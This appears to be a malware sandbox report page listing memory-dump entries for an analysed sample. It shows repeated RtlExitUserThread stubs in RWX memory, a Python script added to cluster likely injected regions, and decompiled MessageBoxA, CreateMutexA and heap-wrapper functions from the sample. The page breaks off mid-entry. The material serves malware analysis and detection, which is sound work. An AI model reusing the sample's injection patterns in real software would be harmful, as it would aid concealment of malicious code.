                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04F00023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621084536.0000000004F00000.00000040.00000001.sdmp, Offset: 04F00000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05180023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622171050.0000000005180000.00000040.00000001.sdmp, Offset: 05180000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 00D90023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.604102341.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04FA0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621553945.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 053D0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622813556.00000000053D0000.00000040.00000001.sdmp, Offset: 053D0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 059E0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623915822.00000000059E0000.00000040.00000001.sdmp, Offset: 059E0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05880023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623634608.0000000005880000.00000040.00000001.sdmp, Offset: 05880000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 055B0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623164978.00000000055B0000.00000040.00000001.sdmp, Offset: 055B0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 054C0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623004205.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04DD0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620501708.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 056A0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623303576.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04E80023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620727344.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 00DD0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.604193675.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 052E0023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622543503.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 00E10023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.604260855.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05270023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622428642.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05970023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623822523.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 04E10023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620573287.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05790023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623471422.0000000005790000.00000040.00000001.sdmp, Offset: 05790000, based on PE: false
                                    Similarity
                                    • API ID: ExitThreadUser
                                    • String ID:
                                    • API String ID: 3424019298-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%
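
Every entry in the run above is the same stub: identical Opcode ID and Instruction ID, a call to RtlExitUserThread(0) at +0x23 from the region base, in a region whose dump name carries protection 00000040 (PAGE_EXECUTE_READWRITE) and that is "based on PE: false", all in process slot 0x14. The Sleep(FFFFFFFF) entries further down the report have the same shape at +0x26, with one Opcode ID but varying Instruction IDs, which suggests the Opcode ID hashes opcodes only and ignores the operand bytes that shift with the base. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses these records, decodes the protection constant, keeps only writable-and-executable regions that are not PE-backed, and clusters them by process, API and Opcode ID so that a page of near-identical listings collapses to one line per stub. Assumptions: the meaning of the dump-name fields other than the base address and the protection value (those two are confirmed by the Offset and the 0x40 constant), and the sample text, which is constructed from entries on this page and trimmed to the lines the parser reads.

```python
import re
from collections import defaultdict

# Page protection constants from winnt.h; the dump name carries one of them.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Constructed sample: four entries copied from this report, trimmed to the lines the
# parser reads (two RtlExitUserThread stubs, one Sleep stub, one PE-backed function).
SAMPLE = """\
APIs
• RtlExitUserThread.NTDLL(00000000), ref: 05180023
• Source File: 00000014.00000002.622171050.0000000005180000.00000040.00000001.sdmp, Offset: 05180000, based on PE: false
• Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
• Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
APIs
• RtlExitUserThread.NTDLL(00000000), ref: 00D90023
• Source File: 00000014.00000002.604102341.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
• Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
• Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
APIs
• Sleep.KERNELBASE(FFFFFFFF), ref: 05480026
• Source File: 00000014.00000002.622960310.0000000005480000.00000040.00000001.sdmp, Offset: 05480000, based on PE: false
• Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
• Instruction ID: b8d3c833eb8a0df8985675654c6a98f2dea0f6e466488346a01fc5083a12c31e
APIs
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 24054CD8
• Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Opcode ID: 62e5b82c9f29b78443a84abf5618615f3ffde32acd6ae153d8b7b04fa9adcc3c
• Instruction ID: 702cc106f4a7a2d6b1be419345dde670dc88a8b9112f57552fe3deaaf6047337
"""

API_RE = re.compile(r"•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File: (?P<name>[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.[0-9A-Fa-f]{16}\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8})\.sdmp, Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
ID_RE = re.compile(r"• (?P<key>Opcode ID|Instruction ID): (?P<val>[0-9a-f]{64})")


def parse_records(text):
    """One dict per 'APIs' block: process slot, base, protection, PE backing, API, ref and code hashes."""
    records = []
    for chunk in text.split("APIs\n")[1:]:
        api, src = API_RE.search(chunk), SRC_RE.search(chunk)
        if not api or not src:
            continue
        fields = src["name"].split(".")
        # Dump-name layout assumed from the names on this page: process slot, dump pass, dump
        # counter, base address, page protection, region type; only base and protection are confirmed.
        rec = {
            "process": int(fields[0], 16),
            "base": int(src["base"], 16),
            "protect": int(fields[4], 16),
            "pe_backed": src["pe"] == "true",
            "api": f"{api['api']}.{api['module']}",
            "args": api["args"],
            "ref": int(api["ref"], 16),
        }
        for m in ID_RE.finditer(chunk):
            rec[m["key"].lower().replace(" ", "_")] = m["val"]
        rec["stub_offset"] = rec["ref"] - rec["base"]   # where the API call sits inside the region
        records.append(rec)
    return records


def decode_protect(value):
    """Name the base protection; PAGE_GUARD/NOCACHE/WRITECOMBINE modifier bits live above 0xFF."""
    return PAGE_PROTECT.get(value & 0xFF, f"0x{value:x}")


def private_executable(records):
    """Executable, writable and not backed by a mapped PE: the usual shape of injected code."""
    return [r for r in records
            if not r["pe_backed"]
            and (r["protect"] & 0xFF) in EXECUTABLE
            and (r["protect"] & 0xFF) in WRITABLE]


def cluster_by_code(records):
    """Group regions by process, API and Opcode ID: one stub body, many copies at different bases."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["process"], r["api"], r.get("opcode_id"))].append(r)
    return groups


def summarize(records):
    """One line per cluster, largest first, listing the bases so the count is auditable."""
    lines = []
    for (proc, api, _), members in sorted(cluster_by_code(records).items(), key=lambda kv: -len(kv[1])):
        bases = ", ".join(f"0x{m['base']:08x}" for m in sorted(members, key=lambda m: m["base"]))
        offs = "/".join(f"+0x{o:x}" for o in sorted({m["stub_offset"] for m in members}))
        lines.append(f"process 0x{proc:02x}: {len(members)} x {api}({members[0]['args']}) at {offs}, "
                     f"{decode_protect(members[0]['protect'])}; bases {bases}")
    return lines


if __name__ == "__main__":
    for line in summarize(private_executable(parse_records(SAMPLE))):
        print(line)
```

Run over the sample it prints one line for the two RtlExitUserThread stubs and one for the Sleep(FFFFFFFF) stub; the MessageBoxA function drops out because its region is PE-backed. Fed the full listing, the whole run of RtlExitUserThread entries above becomes a single line with every base enumerated. Note that the PE-backed module at 0x24010000 is also reported as PAGE_EXECUTE_READWRITE; a loader-mapped image normally shows PAGE_EXECUTE_READ for its code, so that region is worth a second look on its own.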

                                    C-Code - Quality: 100%
                                    			E24054CAC() {
                                    				signed int* _t1;
                                    				intOrPtr* _t4;
                                    				CHAR* _t6;
                                    				intOrPtr* _t7;
                                    				int _t10;
                                    				signed int* _t11;

                                    				// Decompiled MessageBoxA wrapper. Four globals supply the two style
                                    				// words, the caption and the text; E24013534 (body not shown here)
                                    				// yields the CHAR* for the string object it is given. Each statement
                                    				// carries its code address, as in the report's address column.
                                    				/* 0x24054cac */ _t1 =  *0x2405ab54; // 0x2405b90c
                                    				/* 0x24054cb3 */ _t11 =  *0x2405ab90; // 0x2405b908
                                    				/* 0x24054cbc */ _t4 =  *0x2405ac3c; // 0x2405b910
                                    				/* 0x24054cc3 */ _t6 = E24013534( *_t4); // lpCaption
                                    				/* 0x24054cc9 */ _t7 =  *0x2405ab68; // 0x2405b914
                                    				/* 0x24054cd8 */ _t10 = MessageBoxA(0, E24013534( *_t7), _t6,  *_t1 |  *_t11); // executed; hWnd = 0, lpText, lpCaption, uType
                                    				/* 0x24054cdd */ return _t10;
                                    			}

                                    APIs
                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 24054CD8
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Message
                                    • String ID:
                                    • API String ID: 2030045667-0
                                    • Opcode ID: 62e5b82c9f29b78443a84abf5618615f3ffde32acd6ae153d8b7b04fa9adcc3c
                                    • Instruction ID: 702cc106f4a7a2d6b1be419345dde670dc88a8b9112f57552fe3deaaf6047337
                                    • Opcode Fuzzy Hash: 62e5b82c9f29b78443a84abf5618615f3ffde32acd6ae153d8b7b04fa9adcc3c
                                    • Instruction Fuzzy Hash: 0FE067B82011009FF740EF5DC481E09B7EDFB59708B4040A0F509EB325CA78AC888F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E24014F18(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                    				CHAR* _t4;
                                    				void* _t8;

                                    				// Decompiled CreateMutexA wrapper: _a4 is lpMutexAttributes and _a12 the
                                    				// mutex name. The 68% quality figure is the decompiler's own confidence;
                                    				// the bInitialOwner operand, which it reconstructs from the "sbb eax, eax"
                                    				// flag-to-boolean idiom below, is the part to treat with caution (do not
                                    				// read a pointer computation into it). Addresses as in the report's column.
                                    				/* 0x24014f1b */ _t4 = _a12;
                                    				/* 0x24014f23 */ asm("sbb eax, eax");
                                    				/* 0x24014f2e */ _t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed; lpMutexAttributes, bInitialOwner, lpName
                                    				/* 0x24014f34 */ return _t8;
                                    			}

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,24038D32,00000000,00000000,00000000,00000000,?,00001388,?,24038DFC,?,24038DFC,?), ref: 24014F2E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: 23451572b9ac7c365ee53129fe26a2961a8c962687dd330d58eed9a717d1f506
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: B6C01273150248AF8700DEA8DC05D9B33DC5728509B008814B518C7104C139E5909B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2401132C(void* __eax, long __edx) {
                                    				signed int _t2;
                                    				void* _t4;
                                    				void* _t5;

                                    				// Decompiled heap-realloc wrapper with register-passed arguments (block
                                    				// in EAX, new size in EDX). The heap handle lives in the global at
                                    				// 0x2405b59c (0x3380000 in this dump); the Flags argument is forced to 0
                                    				// by the "& 0" mask. Addresses as in the report's column.
                                    				/* 0x2401132e */ _t2 =  *0x2405704c; // 0x0
                                    				/* 0x24011337 */ _t4 =  *0x2405b59c; // 0x3380000
                                    				/* 0x2401133d */ _t5 = RtlReAllocateHeap(_t4, _t2 & 0x00000000, __eax, __edx); // executed; HeapHandle, Flags, MemoryPointer, Size
                                    				/* 0x24011342 */ return _t5;
                                    			}

                                    APIs
                                    • RtlReAllocateHeap.NTDLL(03380000,00000000), ref: 2401133D
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 4abe95f850d0d9200a44e547964a90c3e9cda96214ae224148f1167abf786759
                                    • Instruction ID: 3014dd12e75080097e17028eb6ae9be0359eb0967bd29ed8e842effb3de79cbc
                                    • Opcode Fuzzy Hash: 4abe95f850d0d9200a44e547964a90c3e9cda96214ae224148f1167abf786759
                                    • Instruction Fuzzy Hash: 35B092F2110600EEEB59DB9CCC41F1322EDF38C304F8090207108E7101C12DB8808B38
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(03380000,00000000), ref: 24011301
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 7161d32636c3c86d8838c9eab8894fe46237a95b5438a71f7e44a0cee6f9a405
                                    • Instruction ID: a048f9ad4230f0fa17450c3c1741978905e5392653df85ea27266bc0273e2366
                                    • Opcode Fuzzy Hash: 7161d32636c3c86d8838c9eab8894fe46237a95b5438a71f7e44a0cee6f9a405
                                    • Instruction Fuzzy Hash: DFB002A5610500EF9B95EFACCC44F2662EDF79D2547805560B608D7245D52DAC809B21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(03380000,00000000), ref: 24011301
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: b407bbee38ace09f39b99b1c90f003e113612ee676480262dca8026249e0784f
